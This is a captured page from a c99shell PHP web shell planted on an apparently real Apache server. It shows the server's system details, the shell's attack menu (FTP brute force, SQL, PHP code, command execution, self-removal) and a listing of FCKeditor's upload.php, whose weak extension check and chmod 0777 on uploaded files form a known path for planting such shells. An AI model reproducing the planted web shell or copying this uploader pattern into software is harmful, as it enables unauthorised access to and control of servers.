gaiser.org - c99shell

!C99Shell v. 1.0 pre-release build #13!
Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 uid=99(nobody) gid=98(nobody) groups=98(nobody) Safe-mode: OFF (not secure) /usr/local/webmail2/plugins/html_mail/fckeditor/editor/filemanager/upload/php/ drwxr-xr-x Free 318.28 GB of 458.09 GB (69.48%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php 

/*

 * FCKeditor - The text editor for internet

 * Copyright (C) 2003-2005 Frederico Caldeira Knabben

 * 

 * Licensed under the terms of the GNU Lesser General Public License:

 *         http://www.opensource.org/licenses/lgpl-license.php

 * 

 * For further information visit:

 *         http://www.fckeditor.net/

 * 

 * "Support Open Source software. What about a donation today?"

 * 

 * File Name: upload.php

 *     This is the "File Uploader" for PHP.

 * 

 * File Authors:

 *         Frederico Caldeira Knabben (fredck@fckeditor.net)

 */



require('config.php') ;

require('util.php') ;



// This is the function that sends the results of the uploading process.

function SendResults( $errorNumber, $fileUrl = '', $fileName = '', $customMsg = '' )

{

    echo '<script type="text/javascript">' ;

    echo 'window.parent.OnUploadCompleted(' . $errorNumber . ',"' . str_replace( '"', '\\"', $fileUrl ) . '","' . str_replace( '"', '\\"', $fileName ) . '", "' . str_replace( '"', '\\"', $customMsg ) . '") ;' ;

    echo '</script>' ;

    exit ;

}



// Check if this uploader has been enabled.

if ( !$Config['Enabled'] )

    SendResults( '1', '', '', 'This file uploader is disabled. Please check the "editor/filemanager/upload/php/config.php" file' ) ;



// Check if the file has been correctly uploaded.

if ( !isset( $_FILES['NewFile'] ) || is_null( $_FILES['NewFile']['tmp_name'] ) || $_FILES['NewFile']['name'] == '' )

    SendResults( '202' ) ;



// Get the posted file.

$oFile = $_FILES['NewFile'] ;



// Get the uploaded file name and extension.

$sFileName = $oFile['name'] ;

$sOriginalFileName = $sFileName ;

$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;

$sExtension = strtolower( $sExtension ) ;



// The the file type (from the QueryString, by default 'File').

$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;



// Get the allowed and denied extensions arrays.

$arAllowed    = $Config['AllowedExtensions'][$sType] ;

$arDenied    = $Config['DeniedExtensions'][$sType] ;



// Check if it is an allowed extension.

if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )

    SendResults( '202' ) ;



$sErrorNumber    = '0' ;

$sFileUrl        = '' ;



// Initializes the counter used to rename the file, if another one with the same name already exists.

$iCounter = 0 ;



// The the target directory.

$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;



while ( true )

{

    // Compose the file path.

    $sFilePath = $sServerDir . $sFileName ;



    // If a file with that name already exists.

    if ( is_file( $sFilePath ) )

    {

        $iCounter++ ;

        $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;

        $sErrorNumber = '201' ;

    }

    else

    {

        move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;



        if ( is_file( $sFilePath ) )

        {

            $oldumask = umask(0) ;

            chmod( $sFilePath, 0777 ) ;

            umask( $oldumask ) ;

        }

        

        $sFileUrl = $Config["UserFilesPath"] . $sFileName ;



        break ;

    }

}



SendResults( $sErrorNumber, $sFileUrl, $sFileName ) ;

?>

:: Command execute ::
Enter:	Select: